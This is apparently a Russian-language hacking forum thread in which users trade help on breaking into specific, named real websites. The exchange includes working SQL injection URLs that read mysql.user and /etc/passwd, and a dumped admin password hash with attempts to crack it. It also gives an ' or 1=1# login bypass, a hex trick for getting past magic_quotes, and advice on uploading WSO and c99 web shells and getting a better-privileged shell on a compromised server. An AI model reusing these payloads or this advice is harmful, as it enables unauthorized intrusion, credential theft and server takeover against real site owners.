проверяю на запись и пытаюсь записать так: union+select+file_priv+from+mysql.user+where+user= 'имя юзера' union+select+LOAD_FILE('/etc/passwd')+from+mysql.user если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать? например как быть тут http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+where+user='stmary_stmary'-- тут ведь нет таблицы user
в базе данных "mysql" информация о юзверях всегда в табличке "user", во-первых. Во вторых, для начала проверь есть ли доступ к "mysql.user" - если нет, то file_priv в 95% случаев нет Смотришь, есть ли доступ к mysql.user. Доступа нет.
Подскажите, пожалуйста, есть здесь SQL Иньекция или нет? http://www.klipart.ru/package.php?id=symmetricspiders'
если есть все условия для шела через скуль, то мона форму загрузки файла с оброботчиком запихнуть, а потом через веб залить нормальный шелл, как вариант
я только что залил шелл wso 2.4 на сайт, но при попытке зайти пишется: Fatal error: Call to undefined function: gzinflate() сервер - Apache/2.0.59 (Unix) PHP/4.4.6 c99 нормально работает, но всё-таки хотелось бы узнать причину..
wso походу сжат и использует функцию gzinflate() для распаковки данных. возможно на сервере отключена или не инсталлирована эта функция(библиотека)
не могу проверить привилегии http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.user+where+user='tourismepmysql'-- доступ к mysql.user вродь есть, в чем трабла?
Code: http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,user,3,4,5,6,7+from+mysql.user-- SELECT command denied to user: '[email protected]' for table 'user' 1. Нет прав на таблу mysql.user - не проверишь 2. Magic_quotes = ON, where user = 0x746f757269736d65706d7973716c 3. Слушать BlackSun, но помнить про Magic_quotes = ON
Ы_Ы Решено : Query failed: Column 'password' cannot be null Query failed: Column 'username' cannot be null Тока таблица admin пустая1 Что со схемой - ХЗ!
Для работы функции gzinflate необходима библиотека zlib, она появилась в php с версии 4.0.4. По умолчанию поддержка этой библиотеки в PHP не включена. Так что можешь попробовать покапаться в исходниках wso и найти упакованную строку функцией gzdeflate и распаковать у себя, а на сервак залить уже без использования этих функций
На этом сайте: http://qatarlc.net/page.php?id=-15+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8+from+test.admin+--+ у админа странный хэш: 1:super:202cb962ac59075b964b07152d234b70200820e322 7815ed1756a6b531e7e0d2 админка тут: http://qatarlc.net/admin/ Подбор хэша: 202cb962ac59075b964b07152d234b70 - 123 200820e3227815ed1756a6b531e7e0d2 - qwe123 Но, это не проходит. Как еще можно подобрать хэш, чтобы попасть а админку?
А почему ты решил, что БД test, а не qatarlc_DB, как говорится в database()? warlok, или login: ' or 1=1# password: qwerty
если у тебя file_priv:Y (есть возможность читать файлы на сервере), попробуй читать исходники страниц сайта...это может очень помочь
Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл
